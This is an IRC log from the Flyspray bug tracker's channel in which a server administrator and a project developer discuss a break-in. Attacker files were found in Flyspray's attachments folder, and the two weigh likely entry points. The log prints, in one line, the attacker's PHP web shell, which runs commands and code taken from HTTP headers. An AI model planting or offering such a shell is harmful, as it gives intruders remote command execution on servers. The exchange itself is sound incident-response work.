IRC log for #flyspray on 20090816

02:25.16*** join/#flyspray cytrinox_ (n=cyx@Zea7f.z.pppool.de)
08:32.37*** join/#flyspray floele (n=Miranda@p5DCA5606.dip.t-dialin.net)
08:32.37*** mode/#flyspray [+o floele] by ChanServ
09:50.37*** join/#flyspray brain0 (n=brain0@archlinux/developer/brain0)
09:52.03brain0is there a known vulnerability in flyspray that would allow an attacker to execute code that has been uploaded as an attachment before?
09:54.53brain0there was a process running with: /proc/$PID/exe -> /srv/http/flyspray-0.9.9.6/attachments/. /wunderbar_emporium/heh1 (deleted)
09:55.07brain0however, script and cgi execution is disabled in the attachments folder
11:30.46floelewe're not aware of any such vulnerabilities, otherwise we'd certainly fix it
11:33.10brain0hmmm
11:33.13brain0thank you for now
11:33.35brain0it's weird anyway: execution of scripts on the attachments folder is disabled, but a .php script still got executed
11:33.57brain0we 403'ed the folder for now, but some webapp must have allowed an upload and execution of the script into that folder
11:34.52floelewhat kind of script was running actually?
11:39.35brain0<?php if($_SERVER['HTTP_CMD']) passthru($_SERVER['HTTP_CMD']); if($_SERVER['HTTP_EVL']) eval($_SERVER['HTTP_EVL]'); ?>
11:39.55floeleok, that's not so nice ;)
11:40.35brain0not really
11:41.01brain0I cannot say for sure it was even flyspray (there's also mediawiki running, and some more apps)
11:41.07floeleso is /wunderbar_emporium/heh1 that script?
11:41.17brain0only that all of this happened inside flyspray's attachment folder
11:41.29brain0no, that is a binary which was compiled afterwards and executed
11:42.31brain0that script was simply called ".php"
11:43.36floelehm...maybe the attacker needed a for PHP writable folder, which can be accessed from the outside? flyspray itself doesn't allow you to upload files with arbitrary names
11:45.40brain0yes, I know that, I looked around in the source a bit
11:46.04brain0so the attacker must have known in advance where that directory is and used a whole in another webapp
11:46.08brain0maybe
11:46.10brain0maybe not
11:47.15floeleI just remember a similar script from an attack through phpBB...maybe you've got an old version running somewhere?
11:49.10brain0we have punBB
11:50.15brain0it's still weird that the attacker knew where to look for the attachments folder
11:50.29brain0ah, maybe he had it from a php error messages, which often include complete paths
11:51.06floelecould be the case, yep
11:51.06brain0so if - at some point - the attacker was able to trigger a php error in flyspray, he would have known the path /srv/http/flyspray-0.9.9.6 or even /srv/http/flyspray-0.9.9.6/attachments from the error message
11:51.36floelewell, attachments is not hard to guess anyway
11:51.56brain0well, thank you anyway, if we ever find out what happened, I will tell you (especially if it was flyspray's fault after all)
11:52.43floeleyep, that'd be appreciated ,)

Generated by irclog2html.pl Modified by Tim Riker to work with infobot.